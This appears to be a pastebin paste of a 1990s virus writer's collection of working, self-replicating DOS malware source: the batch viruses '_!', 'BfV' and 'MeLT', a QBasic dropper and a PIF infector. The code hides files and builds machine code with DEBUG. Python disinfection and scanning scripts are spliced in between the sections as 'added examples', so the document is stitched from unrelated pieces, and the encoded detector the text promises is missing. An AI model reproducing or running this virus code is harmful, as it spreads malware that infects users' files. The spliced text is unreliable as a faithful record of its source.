Untitled

a guest
Sep 22nd, 2017
All of these replicating programs require standard MSDOS 6 to function
properly. The FIND command must return an errorlevel or they won't work.

I'll dispense with the boring warnings; suffice it to say if you utilize
any of this in an irresponsible or damaging way then you are responsible
for whatever your actions cause.

As written these programs are not damaging to data and will only affect
BAT, BAS and PIF files. One could say this is still data but no malice is
intended. Art maybe. Others might not be so nice - batch viruses are
perfectly capable of carrying deadly payloads.

Recovery from these creatures is easy - load the batch or basic file into
EDIT and remove the added virus code. In the case of the PIF virus use
the Windows PifEdit program to change the ...bat in the filename field
back to ...com or ...exe and remove the hidden companion batch. Some of
these viruses make hidden files, use 'DIR \ /AH /S' to find them then for
each file that is actually a virus issue 'ATTRIB file -H' then 'DEL file'.
Make sure you remove only virus files, leave hidden system files like
MSDOS.SYS and IO.SYS (and others) alone!
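The recovery step above (remove the added virus lines from the host) can be mechanised because, as the text explains further on, every replicating line carries the virus's key string. The script below is an added example and is not part of the original document. It drops every line containing the key, and, because an advanced infector's prepended first line may not carry the key in the same case (MeLT's "goto meltbeg" versus its key "MeLT"), it also drops any line that jumps to a label defined on a removed line; DOS labels compare case-insensitively. The infected sample is constructed and its "virus" lines are inert placeholders.

```python
"""Strip appended batch-virus code from a host batch file (added example)."""
import re
import sys

GOTO = re.compile(r"\bgoto\s+(\S+)", re.IGNORECASE)


def _label_of(line):
    """Label name for a ':name' line, or None (':: comment' lines are not labels)."""
    s = line.strip()
    if s.startswith(":") and not s.startswith("::") and s[1:].split():
        return s[1:].split()[0].lower()
    return None


def disinfect(text, key, case_insensitive=False):
    """Return (cleaned_text, lines_removed) for a host carrying key string `key`."""
    fold = str.lower if case_insensitive else (lambda s: s)
    lines = text.splitlines()
    is_virus = [fold(key) in fold(ln) for ln in lines]
    # labels that live on virus lines; a jump to one of them is virus glue too
    virus_labels = {_label_of(ln) for ln, v in zip(lines, is_virus) if v and _label_of(ln)}
    kept = []
    removed = 0
    for ln, v in zip(lines, is_virus):
        m = GOTO.search(ln)
        if v or (m and m.group(1).lower() in virus_labels):
            removed += 1
            continue
        kept.append(ln)
    # appenders leave a blank separator before their code; drop trailing blanks
    while kept and not kept[-1].strip():
        kept.pop()
    return "\n".join(kept) + "\n", removed


def is_clean(text, key, case_insensitive=False):
    """True when no line of text still carries the key string."""
    fold = str.lower if case_insensitive else (lambda s: s)
    return not any(fold(key) in fold(ln) for ln in text.splitlines())


# Constructed sample: a two-line host with a prepended jump and an appended,
# inert block using the key string "KX" (layout modelled on the MeLT description).
INFECTED = """@if not '%0==' if '%_kx%==' goto kxbeg
@echo off
echo Hello World!

@goto KXend [KX_demo]
:KXbeg
echo KX placeholder, inert stand-in for virus lines
:KXend
"""

if __name__ == "__main__":
    if len(sys.argv) == 3:   # usage: disinfect.py HOST.BAT KEY
        with open(sys.argv[1], "r", errors="replace") as fh:
            cleaned, n = disinfect(fh.read(), sys.argv[2])
        sys.stdout.write(cleaned)
        sys.stderr.write("removed %d line(s)\n" % n)
    else:
        cleaned, n = disinfect(INFECTED, "KX")
        print(cleaned, end="")
        print("removed %d line(s), clean=%s" % (n, is_clean(cleaned, "KX")))
```

Pass `case_insensitive=True` only when the virus itself matches its key with FIND /I; otherwise a case-sensitive pass plus the label rule is the safer choice, since it cannot remove host lines that merely happen to contain the key in a different case. Always diff the cleaned output against the original before replacing the file.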
  21.  
  22.  
About batch viruses
-------------------

Reproducing batch programs use the FIND command to separate their code
from the program that code is attached to. For this to work, every
replicating line in the virus must contain a specific string, the key
string of the virus. Another vital component of a replicating batch
is the FOR command, used to scan for other batch files, usually with
the mask "*.BAT". A variety of commands can be used for the actual
infection, including FIND, TYPE, ECHO, COPY and MOVE. Simple batch
replicators just append their code at the end of batches in the hope
it will run (usually it does). Advanced infectors modify the start of
the batch to force the issue. In such cases the added first line does
not contain the key string but is added by an ECHO within the virus.

This is not the only type of batch virus! Batch viruses can be written
in assembly and use either DEBUG or ECHO to hide the virus code in hex
or text which is attached to infected batches. These tend to be very
advanced. A batch file can also rename a binary then copy itself to a
batch with the same base name. This one's been around for a while.

Most of the viruses presented here become a self-contained part of the
host, giving them that coveted ability of travel. Machine code is used
only for specific functions, not for reproduction. That is done with
plain old DOS. Only DOS 6 seems vulnerable to these types of viruses;
I have no information on PCDOS, 4DOS or other operating environments.
They run on my system and probably on many others.

At the end of this document is an encoded batch that will detect most
(practically all) batch viruses of this type and also suspicious code
that might indicate a trojan or advanced batch virus of the assembly
type. Use a UU decoder to extract the file "BATALERT.BAT".
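The traits listed in this section (a key string shared by the replicating lines and pulled out with FIND, a FOR loop over *.BAT hosts, hex ECHOed into a script for DEBUG, ATTRIB +H and CTTY NUL housekeeping) are enough for a simple scanner. The one below is an added example; it is not BATALERT.BAT and not part of the original document. Both sample batches are constructed; the suspicious one carries only the markers and does not replicate.

```python
"""Heuristic scanner for self-replicating DOS batch code (added example)."""
import os
import re

# find "KEY"<file : filtering the virus's own lines out of a host
KEY_EXTRACT = re.compile(r'\bfind\s+(/i\s+)?"([^"]+)"\s*<', re.IGNORECASE)
# for %a in (*.bat ...) : looking for further hosts
HOST_SCAN = re.compile(r'\bfor\s+%%?\w+\s+in\s*\([^)]*\*\.(bat|bas|pif)', re.IGNORECASE)
# echo e 100 B4 4C ... : machine code assembled through DEBUG
HEX_ECHO = re.compile(r'\becho\s+e\s+[0-9a-f]{3,4}(\s+[0-9a-f]{2}){3,}', re.IGNORECASE)
DEBUG_RUN = re.compile(r'\bdebug\b[^\n]*<', re.IGNORECASE)
HIDE = re.compile(r'\battrib\b[^\n]*\+h', re.IGNORECASE)
CTTY_NUL = re.compile(r'\bctty\s+nul', re.IGNORECASE)


def scan_batch(text):
    """Return a list of (finding, detail) pairs; an empty list means nothing matched."""
    lines = text.splitlines()
    findings = []
    scans_hosts = any(HOST_SCAN.search(ln) for ln in lines)
    for ln in lines:
        m = KEY_EXTRACT.search(ln)
        if not m:
            continue
        fold = str.lower if m.group(1) else (lambda s: s)   # honour FIND /I
        key = m.group(2)
        carriers = sum(1 for other in lines if fold(key) in fold(other))
        # the FIND line itself plus at least two more lines sharing the key,
        # together with a host scan, is the replicator signature
        if carriers >= 3 and scans_hosts:
            findings.append(("batch replicator", "key string %r on %d lines" % (key, carriers)))
            break
    if any(HEX_ECHO.search(ln) for ln in lines) and any(DEBUG_RUN.search(ln) for ln in lines):
        findings.append(("machine code via DEBUG", "hex bytes ECHOed into a DEBUG script"))
    if any(HIDE.search(ln) for ln in lines):
        findings.append(("hides files", "ATTRIB +H"))
    if any(CTTY_NUL.search(ln) for ln in lines):
        findings.append(("silences console", "CTTY NUL"))
    return findings


def scan_tree(root):
    """Scan every *.bat below root; returns {path: findings} for files with hits."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".bat"):
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    found = scan_batch(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed sample inputs.
BENIGN = """@echo off
rem nightly copy of notes to the floppy
for %%f in (*.txt) do copy %%f A:\\
type report.log | find "ERROR" > errors.txt
"""

SUSPECT = """@echo off
echo Hello World!
rem ---- constructed marker block, intentionally not a working replicator ----
for %%a in (*.bat) do echo checking %%a
find "KEYX"<%0.bat>>%KEYX_target%
echo e 100 B4 4C CD 21>KEYX.scr
debug<KEYX.scr>nul
attrib KEYX.scr +h
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_batch(sample) or "clean")
```

The replicator verdict needs both halves (a key string repeated across lines and a host scan) so that an ordinary batch using FIND or FOR on its own is not flagged; the other three findings are weaker on their own and are reported as things worth a look rather than as a verdict.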
  55.  
  56.  
Batch virus "_!"
----------------

Infects parent and current directories
Virus code is appended to the host batch
Only works if host is in current directory
Infects just one batch unless new clean batches are added

This is a very simple batch virus. When it runs it appends its code
to another batch file in the parent or current directory. It is not
very effective but illustrates the basics.

----------------------------(cut here)------------------------------------
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
----------------------------(cut here)------------------------------------
  76.  
  77.  
Batch virus "BfV"
-----------------

Creates the hidden file "_BFV" in the root directory of drive C
Infects one batch per run in current and parent directories
Gives up after encountering seven infected batches
Virus code is appended to the host batch

This is an improved appender. It only has to be run from its own directory
once to enable it to reproduce even when the host is in a path directory.
To avoid slowing batch files down too much it exits if it can't infect
after checking seven batch files. If the host batch ends with nul characters
it removes them so the virus code will run.

----------------------------(cut here)------------------------------------
@echo off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
----------------------------(cut here)------------------------------------
  116.  
  117.  
Batch virus "MeLT"
------------------

Creates the hidden file "MELT_2A" in the temp directory
Infects files in the current, parent and all path directories
Infects one batch per run if less than ten infected files encountered
After detecting ten infected files it displays a graphics screen effect
Adds one line before the host batch and appends the rest
Will not run if attached to AUTOEXEC.BAT (but infects it)

This batch virus is much more advanced. It takes control from the host
immediately, runs the virus then runs the host batch. The host is run in
such a way as to disable the virus until the host is completely finished
to avoid slowing down batch files that call themselves in a loop. Simple
appenders are very obvious when on such files, but this one causes no
significant speed loss except at startup. This virus carries a harmless
payload which is assembled with the debug command - it 'melts' the screen
in a flash of color then returns it to normal before running the host.

----------------------------(cut here)------------------------------------
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
@echo off
echo Hello World!
::---- end dummy host ----

@goto MeLTend [MeLT_2a]
:MeLTbeg
@echo off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
echo.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
echo e 120 B4 4C CD 21 00>>MeLT.t
echo g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
----------------------------(cut here)------------------------------------
  202.  
  203.  
QBasic virus "BasVir"
---------------------

Infects one BAS file in the current directory per run
Inserts its code in front of the host so it will run first
Does not infect QBasic programs that contain "DECLARE"
Really a batch virus that hides in BASIC code
If the host is renamed the virus won't work

I wrote this in response to someone's request on the net for a virus
written in BASIC. I hope they don't mind if the BASIC program makes
a batch and runs it. It stays out of programs that use procedures to
avoid causing errors; such programs cannot tolerate prepended code.
This is really a joke, but it's a QBasic virus (no? you write one.)

The following must be named BASVIR.BAS to function.

----------------------------(cut here)------------------------------------
basvirH$ = "BASVIR.BAS"
OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir
PRINT #2, "@echo off %BasVir1%"
PRINT #2, "if '%1=='BasVir goto BasVir%2"
PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a"
PRINT #2, "exit": REM BasVir
PRINT #2, ":BasVir2"
PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<%3>nul": REM BasVir
PRINT #2, "if not errorlevel 1 goto BasVirE"
PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir
PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<"; basvirH$; ">>~1"
PRINT #2, "copy %3 ~2>nul": REM BasVir
PRINT #2, "copy /b ~1+~2 %3>nul": REM BasVir
PRINT #2, "exit": REM BasVir
PRINT #2, ":BasVirE"
CLOSE #2: REM BasVir
SHELL "~$": REM BasVir
SHELL "del ~?.*": REM BasVir
REM ******* [BasVir] the QBasic Virus *******
REM This is a dummy host program
SYSTEM
----------------------------(cut here)------------------------------------
  244.  
  245.  
PIF virus "PiFV"
----------------

Creates hidden batch files with the same base name as host
Modifies PIF to run the hidden batch instead of host program
After infecting more PIFs the companion batch runs the host
Sometimes displays a stupid message on Saturdays (it was late)

This might be the first PIF virus. One problem with PIF infection is
the PIF file must be actually run or it won't work. If the user runs
the actual program the virus won't work. It has other problems but is
functional enough for a demo. I don't feel up to fixing it right now.
It's pretty infectious right now...

----------------------------(cut here)------------------------------------
:: Windows PIF Virus (in batch!)
:: Prog by WaveFunc May 13, 1995
:: (these comments will not replicate)
::
:: This is a virus that 'infects' PIF files, used by Windows to
:: run DOS programs. It works by creating hidden companion batches
:: containing copies of this then altering the PIF file so that the
:: companion batch runs first. After the companion runs it runs the
:: original host program, the name of which is encoded into the
:: companion. The pif files are marked so that they will not be
:: re-infected. Only PIFs are affected, no changes are made to
:: the infected programs. To 'cure', use PIFEDIT to restore the
:: original filenames then delete the hidden files.
::
@echo off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
echo.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
echo.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=echo
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
echo [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
echo m 124,162 524>PiFV!
echo e 100 '@set fn='>>PiFV!
echo m 524,562 108>>PiFV!
echo n pifv$.bat>>PiFV!
echo rcx>>PiFV!
echo 47>>PiFV!
echo w>>PiFV!
echo m 55E,561 108>>PiFV!
echo e 10C 0>>PiFV!
echo n pifv$$.bat>>PiFV!
echo rcx>>PiFV!
echo 10>>PiFV!
echo w>>PiFV!
echo q>>PiFV!
:PiFV_1
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
echo %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
echo n pifv$.com>>PiFV$$
echo rcx>>PiFV$$
echo 2a>>PiFV$$
echo w>>PiFV$$
echo q>>PiFV$$
debug<PiFV$$>nul
echo %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
echo @echo off>%PiFVb%
echo set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
echo e 15E 'PiFV',0>PiFV$$
echo e 124 '%PiFVb%',0>>PiFV$$
echo w>>PiFV$$
echo q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
:: wonder how many bugs all this has in it? Only one
:: way to find out...
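The cure described in the PIF section's comments (restore the original filename with PIFEDIT, delete the hidden companion) starts with finding which PIFs were redirected. The checker below is an added example, not part of the original document. Its offsets are taken from the DEBUG script above: DEBUG loads a file at 100h, so the "m 124,162" copy of the program name is file offset 24h (63 bytes, NUL-terminated) and the marker written with "e 15E 'PiFV',0" is file offset 5Eh, in the unused tail of that field. That this field is the PIF's program-path field, and the 369-byte PIF size, are assumptions on my part; the sample PIF images are constructed in code.

```python
"""Flag Windows PIFs whose program entry has been pointed at a batch (added example)."""
PROGRAM_OFF = 0x24      # memory 124h in DEBUG minus its 100h load base
PROGRAM_LEN = 0x3F      # "m 124,162" copies 63 bytes
MARKER_OFF = 0x5E       # memory 15Eh minus 100h
MARKER = b"PiFV"        # infection marker the text's batch writes
PIF_SIZE = 0x171        # size of a classic 369-byte PIF (assumption)


def inspect_pif(data):
    """Return a dict describing what the PIF launches and whether it looks redirected."""
    field = data[PROGRAM_OFF:PROGRAM_OFF + PROGRAM_LEN]
    program = field.split(b"\0", 1)[0].decode("ascii", "replace")
    tail = data[MARKER_OFF:MARKER_OFF + len(MARKER)]
    runs_batch = program.upper().endswith(".BAT")
    return {
        "program": program,
        "runs_batch": runs_batch,
        "marked": tail == MARKER,
        # a PIF that launches a batch and carries the marker is the companion
        # pattern; either sign on its own is still worth a look in PIFEDIT
        "suspicious": runs_batch or tail == MARKER,
    }


def make_pif(program, marker=None):
    """Build a constructed PIF image with only the fields this check reads filled in."""
    img = bytearray(PIF_SIZE)
    path = program.encode("ascii")
    assert len(path) < PROGRAM_LEN
    img[PROGRAM_OFF:PROGRAM_OFF + len(path) + 1] = path + b"\0"
    if marker:
        img[MARKER_OFF:MARKER_OFF + len(marker) + 1] = marker + b"\0"
    return bytes(img)


# Constructed samples: an untouched PIF and one pointed at a companion batch.
CLEAN_PIF = make_pif("C:\\UTIL\\LIST.COM")
REDIRECTED_PIF = make_pif("LIST.BAT", MARKER)

if __name__ == "__main__":
    import sys
    if sys.argv[1:]:
        for p in sys.argv[1:]:
            with open(p, "rb") as fh:
                print(p, inspect_pif(fh.read()))
    else:
        print("clean:", inspect_pif(CLEAN_PIF))
        print("redirected:", inspect_pif(REDIRECTED_PIF))
```

For a flagged PIF the remaining steps are the ones the text gives: the companion is the hidden .BAT named in the program field, the original program name is on its "set pifvo=" line, and PIFEDIT restores the field once the companion has been unhidden and deleted.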